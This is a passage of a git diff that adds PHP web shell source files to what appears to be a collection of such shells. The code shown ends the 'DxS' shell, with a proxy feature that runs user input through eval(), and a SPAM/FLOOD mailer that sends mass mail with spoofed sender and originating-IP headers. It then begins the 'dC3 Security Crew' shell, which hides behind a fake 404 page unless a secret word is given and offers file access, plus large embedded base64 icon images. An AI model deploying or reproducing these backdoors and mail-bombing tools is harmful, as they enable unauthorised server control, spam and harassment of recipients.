+	print "\n".'<tr><td width=100pt class=linelisting><nobr>COOKIES (php eval)</td><td><input type=text name="DxProx_CKI" value="'.(isset($_POST['DxProx_CKI'])?$_POST['DxProx_CKI']:'array(\'cookiename\' => \'val\')').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td colspan=2><input type=submit value="Go" class=submit style="width:100%;">';
+	print "\n".'</td></tr></table></form>';
+
+	if (!isset($_POST['DxProx_Url'])) die();
+
+	print str_repeat("\n", 10).'<!-- DxS Proxy Browser -->'."\n\n";
+
+	if (empty($_POST['DxProx_PST'])) $_POST['DxProx_PST']=array();
+		else {if (eval('$_POST[\'DxProx_PST\']='.$_POST['DxProx_PST'].';')===FALSE) $_POST['DxProx_PST']=array();}
+	if (empty($_POST['DxProx_CKI'])) $_POST['DxProx_CKI']=array();
+		else {if (eval('$_POST[\'DxProx_CKI\']='.$_POST['DxProx_CKI'].';')===FALSE) $_POST['DxProx_CKI']=array();}
+
+	$URLPARSED=parse_url($_POST['DxProx_Url']);
+	$request=DxHTTPMakeHeaders('GET', (empty($URLPARSED['path'])?'/':$URLPARSED['path']).(!empty($URLPARSED['query'])?'?'.$URLPARSED['query']:''), $URLPARSED['host'], $_POST['DxProx_Brw'], $_POST['DxProx_Ref'], $_POST['DxProx_PST'], $_POST['DxProx_CKI']);
+	if (!($f=@fsockopen($URLPARSED['host'], (empty($URLPARSED['port']))?80:$URLPARSED['port'], $errno, $errstr, 10)))
+		die(DxError('Sock #'.$errno.' : '.$errstr));
+	fputs($f, $request);
+
+	$RET='';
+	while (!feof($f)) $RET.=fgets($f, 4096 );
+	fclose( $f );
+
+	print "\n".'<table width=100% border=0><tr><td>';
+	$headers_over_place=strpos($RET,"\r\n\r\n");
+	if ($headers_over_place===FALSE)	print $RET;
+		else
+		print '<pre><font class=highlight_txt>'.substr($RET, 0, $headers_over_place).'</font></pre><br><hr><br>'.substr($RET, $headers_over_place);
+	print str_repeat("\n", 10).'</td></tr></table>';
+	}
+
+########
+########   MAIL
+########
+if ($_GET['dxmode']=='MAIL')
+	{	if (!isset($_GET['dxparam']))
+		{
+		print '';		print "\n".'<form action="'.DxURL('kill', '').'" method=GET style="display:inline;">';
+		DxGETinForm('leave', '');
+		print "\n".'<input type=submit name="dxparam" value="SPAM" style="position: absolute; width: 30%; left: 10%;">'
+			.'<font class=highlight_txt style="position:absolute;left:46.5%;">: MAIL mode :</font>'
+			.'<input type=submit name="dxparam" value="FLOOD" style="position: absolute; width: 30%; right: 10%;">';
+		print "\n".'</form>';
+		die();}
+
+	if (ini_get('sendmail_path')=='') DxWarning('php.ini "sendmail_path" is empty! ('.var_export(ini_get('sendmail_path'), true).')');
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table width=100% cellspacing=0 width=90% align=center><col width=100pt>';
+	if ($_GET['dxparam']=='FLOOD')
+		{		print "\n".'<tr><td class=linelisting><b>TO: </td><td><input type=text name="DxMailer_TO" style="width:100%;" value="'.(  (empty($_POST['DxMailer_TO']))?'tristam@mail.ru':$_POST['DxMailer_TO']  ).'"></td></tr>';
+		print "\n".'<tr><td class=linelisting><b>NUM FLOOD: </td><td><input type=text name="DxMailer_NUM" value="'.(  (empty($_POST['DxMailer_NUM']))?'1000':$_POST['DxMailer_NUM']  ).'" SIZE=10></td></tr>';
+		}
+		else		print "\n".'<tr><td class=linelisting><b>TO: </td><td><textarea name="DxMailer_TO" rows=10 style="width:100%;">'.(  (empty($_POST['DxMailer_TO']))?'tristam@mail.ru'."\n".'billy@microsoft.com':$_POST['DxMailer_TO']  ).'</textarea></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>FROM: </td><td><input type=text name="DxMailer_FROM" value="'.(  (empty($_POST['DxMailer_FROM']))?'DxS <admin@'.$_SERVER['HTTP_HOST']:$_POST['DxMailer_FROM']  ).'>" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>SUBJ: </td><td><input type=text name="DxMailer_SUBJ" style="width:100%;" value="'.(  (empty($_POST['DxMailer_SUBJ']))?'Look here, man...':$_POST['DxMailer_SUBJ']  ).'"></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>MSG: </td><td><textarea name="DxMailer_MSG" rows=5 style="width:100%;">'.(  (empty($_POST['DxMailer_MSG']))?'<html><body><b>Wanna be butchered?':$_POST['DxMailer_MSG']  ).'</textarea></td></tr>';
+	print "\n".'<tr><td class=linelisting colspan=2><div align=center><input type=submit Value="'.$_GET['dxparam'].'" class=submit style="width:70%;"></tr>';
+	print "\n".'</td></table></form>';
+
+	if (!isset($_POST['DxMailer_TO'])) die();
+
+	$HEADERS='';
+	$HEADERS.= 'MIME-Version: 1.0'."\r\n";
+	$HEADERS.= 'Content-type: text/html;'."\r\n";
+	$HEADERS.='To: %%TO%%'."\r\n";
+	$HEADERS.='From: '.$_POST['DxMailer_FROM']."\r\n";
+	$HEADERS.='X-Originating-IP: [%%IP%%]'."\r\n";
+	$HEADERS.='X-Mailer: DxS v'.$GLOB['SHELL']['Ver'].' Mailer'."\r\n";
+	$HEADERS.='Message-Id: <%%ID%%>';
+
+	if ($_GET['dxparam']=='FLOOD')
+		{		$NUM=$_POST['DxMailer_NUM'];
+		$MAILS=array($_POST['DxMailer_TO']);
+		}
+		else
+		{		$MAILS=explode("\n",str_replace("\r", '', $_POST['DxMailer_TO']));
+		$NUM=1;
+		}
+
+	function DxMail($t, $s, $m, $h)   /* debugger */
+	{print "\n\n\n<br><br><br>".$t."\n<br>".$s."\n<br>".$m."\n<br>".$h;}
+
+	$RESULTS[]=array();
+
+	for ($n=0;$n<$NUM;$n++)
+	for ($m=0;$m<count($MAILS);$m++)		$RESULTS[]=(int)
+		mail($MAILS[$m], $_POST['DxMailer_SUBJ'], $_POST['DxMailer_MSG'],
+			str_replace(array('%%TO%%','%%IP%%', '%%ID%%'),
+						array('<'.$MAILS[$m].'>'  ,  long2ip(mt_rand(0,pow(2,31)))  ,  md5($n.$m.DxRandomChars(3).time())),
+						$HEADERS)
+			);
+
+	print "\n\n".'<br><br>'.array_sum($RESULTS).' mails sent ('.(		(100*array_sum($RESULTS))/($NUM*(count($MAILS)))		).'% okay)';
+
+	}
+
+if ($DXGLOBALSHIT) print "\n\n\n".'<!--/SHIT KILLER--></TD></TR></TABLE>';
+die();
+?>
+
diff --git a/138shell/D/dC3 Security Crew Shell PRiV.txt b/138shell/D/dC3 Security Crew Shell PRiV.txt
new file mode 100644
index 0000000..e99383d
--- /dev/null
+++ b/138shell/D/dC3 Security Crew Shell PRiV.txt	
@@ -0,0 +1,1273 @@
+<?PHP
+/* 
+ver=5
+----------------------Only For Priv8 Use---------------------------------
+               I dont support illegal actions!
+-------------------------------------------------------------------------
+          dC3 Security Crew
+-------------------------------------------------------------------------
+By turning "on" safe you can make your shell in 404 Not Find mode if the user doesnt know your OWN set word!
+-------------------------------------------------------------------------
+Shell written by Bl0od3r
+-------------------------------------------------------------------------
+Easy file managing with a lot of features!
+-------------------------------------------------------------------------
+In work:
+special file options
+-------------------------------------------------------------------------
+*/
+//important
+error_reporting(5);
+@ignore_user_abort(true);
+//
+
+$safe="off";
+$word="secret";
+if ($safe=="on") {
+if (!isset($_GET[$word])) {
+   header('HTTP/1.0 404 Not Found');
+   exit;
+   }
+ }
+$made_by="Bl0od3r";
+$of="Netplayazz";
+($made_by=="Bl0od3r") ? $fake=0 : $fake=1;
+($of=="dc3") ? $fake=0 :  $fake=1;
+$st_dir=".";
+$p=str_replace("\\","/",realpath($_GET['file']));
+$j_d=$_GET['file'];
+$j_f=$_GET['file'];
+$filename = $_GET['file'];
+$file_info = pathinfo($filename);
+$extn = $file_info['extension'];
+
+
+if (isset($_GET['dir'])) {
+ $images = array(
+"download"=>
+"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
+"ext_wri"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"small_dir"=>
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
+"dir"=>"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAAkFBMVEX////MmTT/zGezgRvLmDN/
+f3/AjSi6hyK9iiWgbghra2vCjyr/5oGufBbHlC+jcQuwfhiIiIjJljGcagS1gh24hSCebAaZZwGa
+aAK0gRzvvFfcqUT4xWC8iSRKSkqreRPCwsK/jCeodhDms06lcw23hB/ToDv/1G//4HvFki3/64X/
+95Fqamr//////5n/9I54UBIWAAAAAXRSTlMAQObYZgAAAAFiS0dELc3aQT0AAAAWdEVYdFNvZnR3
+YXJlAGdpZjJwbmcgMi40LjakM4MXAAAAiUlEQVR42oXOxxKCMBgE4CWhVwEp9i4Ekt/3fzuDE0Yd
+D3633dnDAr8su0i/stKi40cmTfnebckXU2GPj8k0U0mui2KIxYu7q1acA2kv1CxWWQ7RWTTbUhAi
+YjaNxppqCZcJGowLlRI+O1FvbKiV8FhFnXGnJgT0n+RwvmZBXbbN3tFPHPnm4L8nl3EWVP90I8IA
+AAAASUVORK5CYII=",
+"o.b" => "/9j/4AAQSkZJRgABAgAAZABkAAD/7AARRHVja3kAAQAEAAAAUAAA/+IMWElDQ19QUk9GSUxFAAEB
+AAAMSExpbm8CEAAAbW50clJHQiBYWVogB84AAgAJAAYAMQAAYWNzcE1TRlQAAAAASUVDIHNSR0IA
+AAAAAAAAAAAAAAEAAPbWAAEAAAAA0y1IUCAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAARY3BydAAAAVAAAAAzZGVzYwAAAYQAAABsd3RwdAAAAfAAAAAUYmtw
+dAAAAgQAAAAUclhZWgAAAhgAAAAUZ1hZWgAAAiwAAAAUYlhZWgAAAkAAAAAUZG1uZAAAAlQAAABw
+ZG1kZAAAAsQAAACIdnVlZAAAA0wAAACGdmlldwAAA9QAAAAkbHVtaQAAA/gAAAAUbWVhcwAABAwA
+AAAkdGVjaAAABDAAAAAMclRSQwAABDwAAAgMZ1RSQwAABDwAAAgMYlRSQwAABDwAAAgMdGV4dAAA
+AABDb3B5cmlnaHQgKGMpIDE5OTggSGV3bGV0dC1QYWNrYXJkIENvbXBhbnkAAGRlc2MAAAAAAAAA
+EnNSR0IgSUVDNjE5NjYtMi4xAAAAAAAAAAAAAAASc1JHQiBJRUM2MTk2Ni0yLjEAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFhZWiAAAAAAAADzUQABAAAA
+ARbMWFlaIAAAAAAAAAAAAAAAAAAAAABYWVogAAAAAAAAb6IAADj1AAADkFhZWiAAAAAAAABimQAA
+t4UAABjaWFlaIAAAAAAAACSgAAAPhAAAts9kZXNjAAAAAAAAABZJRUMgaHR0cDovL3d3dy5pZWMu
+Y2gAAAAAAAAAAAAAABZJRUMgaHR0cDovL3d3dy5pZWMuY2gAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZGVzYwAAAAAAAAAuSUVDIDYxOTY2LTIuMSBEZWZhdWx0
+IFJHQiBjb2xvdXIgc3BhY2UgLSBzUkdCAAAAAAAAAAAAAAAuSUVDIDYxOTY2LTIuMSBEZWZhdWx0
+IFJHQiBjb2xvdXIgc3BhY2UgLSBzUkdCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRlc2MAAAAAAAAA
+LFJlZmVyZW5jZSBWaWV3aW5nIENvbmRpdGlvbiBpbiBJRUM2MTk2Ni0yLjEAAAAAAAAAAAAAACxS
+ZWZlcmVuY2UgVmlld2luZyBDb25kaXRpb24gaW4gSUVDNjE5NjYtMi4xAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAB2aWV3AAAAAAATpP4AFF8uABDPFAAD7cwABBMLAANcngAAAAFYWVogAAAAAABM
+CVYAUAAAAFcf521lYXMAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAKPAAAAAnNpZyAAAAAAQ1JU
+IGN1cnYAAAAAAAAEAAAAAAUACgAPABQAGQAeACMAKAAtADIANwA7AEAARQBKAE8AVABZAF4AYwBo
+AG0AcgB3AHwAgQCGAIsAkACVAJoAnwCkAKkArgCyALcAvADBAMYAywDQANUA2wDgAOUA6wDwAPYA
++wEBAQcBDQETARkBHwElASsBMgE4AT4BRQFMAVIBWQFgAWcBbgF1AXwBgwGLAZIBmgGhAakBsQG5
+AcEByQHRAdkB4QHpAfIB+gIDAgwCFAIdAiYCLwI4AkECSwJUAl0CZwJxAnoChAKOApgCogKsArYC
+wQLLAtUC4ALrAvUDAAMLAxYDIQMtAzgDQwNPA1oDZgNyA34DigOWA6IDrgO6A8cD0wPgA+wD+QQG
+BBMEIAQtBDsESARVBGMEcQR+BIwEmgSoBLYExATTBOEE8AT+BQ0FHAUrBToFSQVYBWcFdwWGBZYF
+pgW1BcUF1QXlBfYGBgYWBicGNwZIBlkGagZ7BowGnQavBsAG0QbjBvUHBwcZBysHPQdPB2EHdAeG
+B5kHrAe/B9IH5Qf4CAsIHwgyCEYIWghuCIIIlgiqCL4I0gjnCPsJEAklCToJTwlkCXkJjwmkCboJ
+zwnlCfsKEQonCj0KVApqCoEKmAquCsUK3ArzCwsLIgs5C1ELaQuAC5gLsAvIC+EL+QwSDCoMQwxc
+DHUMjgynDMAM2QzzDQ0NJg1ADVoNdA2ODakNww3eDfgOEw4uDkkOZA5/DpsOtg7SDu4PCQ8lD0EP
+Xg96D5YPsw/PD+wQCRAmEEMQYRB+EJsQuRDXEPURExExEU8RbRGMEaoRyRHoEgcSJhJFEmQShBKj
+EsMS4xMDEyMTQxNjE4MTpBPFE+UUBhQnFEkUahSLFK0UzhTwFRIVNBVWFXgVmxW9FeAWAxYmFkkW
+bBaPFrIW1hb6Fx0XQRdlF4kXrhfSF/cYGxhAGGUYihivGNUY+hkgGUUZaxmRGbcZ3RoEGioaURp3
+Gp4axRrsGxQbOxtjG4obshvaHAIcKhxSHHscoxzMHPUdHh1HHXAdmR3DHeweFh5AHmoelB6+Hukf
+Ex8+H2kflB+/H+ogFSBBIGwgmCDEIPAhHCFIIXUhoSHOIfsiJyJVIoIiryLdIwojOCNmI5QjwiPw
+JB8kTSR8JKsk2iUJJTglaCWXJccl9yYnJlcmhya3JugnGCdJJ3onqyfcKA0oPyhxKKIo1CkGKTgp
+aymdKdAqAio1KmgqmyrPKwIrNitpK50r0SwFLDksbiyiLNctDC1BLXYtqy3hLhYuTC6CLrcu7i8k
+L1ovkS/HL/4wNTBsMKQw2zESMUoxgjG6MfIyKjJjMpsy1DMNM0YzfzO4M/E0KzRlNJ402DUTNU01
+hzXCNf02NzZyNq426TckN2A3nDfXOBQ4UDiMOMg5BTlCOX85vDn5OjY6dDqyOu87LTtrO6o76Dwn
+PGU8pDzjPSI9YT2hPeA+ID5gPqA+4D8hP2E/oj/iQCNAZECmQOdBKUFqQaxB7kIwQnJCtUL3QzpD
+fUPARANER0SKRM5FEkVVRZpF3kYiRmdGq0bwRzVHe0fASAVIS0iRSNdJHUljSalJ8Eo3Sn1KxEsM
+S1NLmkviTCpMcky6TQJNSk2TTdxOJU5uTrdPAE9JT5NP3VAnUHFQu1EGUVBRm1HmUjFSfFLHUxNT
+X1OqU/ZUQlSPVNtVKFV1VcJWD1ZcVqlW91dEV5JX4FgvWH1Yy1kaWWlZuFoHWlZaplr1W0VblVvl
+XDVchlzWXSddeF3JXhpebF69Xw9fYV+zYAVgV2CqYPxhT2GiYfViSWKcYvBjQ2OXY+tkQGSUZOll
+PWWSZedmPWaSZuhnPWeTZ+loP2iWaOxpQ2maafFqSGqfavdrT2una/9sV2yvbQhtYG25bhJua27E
+bx5veG/RcCtwhnDgcTpxlXHwcktypnMBc11zuHQUdHB0zHUodYV14XY+dpt2+HdWd7N4EXhueMx5
+KnmJeed6RnqlewR7Y3vCfCF8gXzhfUF9oX4BfmJ+wn8jf4R/5YBHgKiBCoFrgc2CMIKSgvSDV4O6
+hB2EgITjhUeFq4YOhnKG14c7h5+IBIhpiM6JM4mZif6KZIrKizCLlov8jGOMyo0xjZiN/45mjs6P
+No+ekAaQbpDWkT+RqJIRknqS45NNk7aUIJSKlPSVX5XJljSWn5cKl3WX4JhMmLiZJJmQmfyaaJrV
+m0Kbr5wcnImc951kndKeQJ6unx2fi5/6oGmg2KFHobaiJqKWowajdqPmpFakx6U4pammGqaLpv2n
+bqfgqFKoxKk3qamqHKqPqwKrdavprFys0K1ErbiuLa6hrxavi7AAsHWw6rFgsdayS7LCszizrrQl
+tJy1E7WKtgG2ebbwt2i34LhZuNG5SrnCuju6tbsuu6e8IbybvRW9j74KvoS+/796v/XAcMDswWfB
+48JfwtvDWMPUxFHEzsVLxcjGRsbDx0HHv8g9yLzJOsm5yjjKt8s2y7bMNcy1zTXNtc42zrbPN8+4
+0DnQutE80b7SP9LB00TTxtRJ1MvVTtXR1lXW2Ndc1+DYZNjo2WzZ8dp22vvbgNwF3IrdEN2W3hze
+ot8p36/gNuC94UThzOJT4tvjY+Pr5HPk/OWE5g3mlucf56noMui86Ubp0Opb6uXrcOv77IbtEe2c
+7ijutO9A78zwWPDl8XLx//KM8xnzp/Q09ML1UPXe9m32+/eK+Bn4qPk4+cf6V/rn+3f8B/yY/Sn9
+uv5L/tz/bf///+4AJkFkb2JlAGTAAAAAAQMAFQQDBgoNAAARtgAAF0YAABuaAAAgJv/bAIQAAgIC
+AgICAgICAgMCAgIDBAMCAgMEBQQEBAQEBQYFBQUFBQUGBgcHCAcHBgkJCgoJCQwMDAwMDAwMDAwM
+DAwMDAEDAwMFBAUJBgYJDQsJCw0PDg4ODg8PDAwMDAwPDwwMDAwMDA8MDAwMDAwMDAwMDAwMDAwM
+DAwMDAwMDAwMDAwM/8IAEQgAHgK8AwERAAIRAQMRAf/EALsAAQACAwEBAAAAAAAAAAAAAAADBQIE
+BgEHAQEAAAAAAAAAAAAAAAAAAAAAEAACAgMBAQADAQEBAAAAAAAAEwQFAiIDARQREhWAIyQRAAAE
+BQIDBwMBBwUAAAAAAAABAgMx0ZMENBEhEhMzQVFhkZLS4nGBIuEQQKGxYmMUMkKiIyQSAQAAAAAA
+AAAAAAAAAAAAAIATAAIBAgYDAAIDAQEAAAAAAAERACFRMUFhodHxEHGR8IFQgMGxMP/aAAwDAQAC
+EQMRAAAB+DlmAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADmDnDbAAAAAAAAANg+hkJr
+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
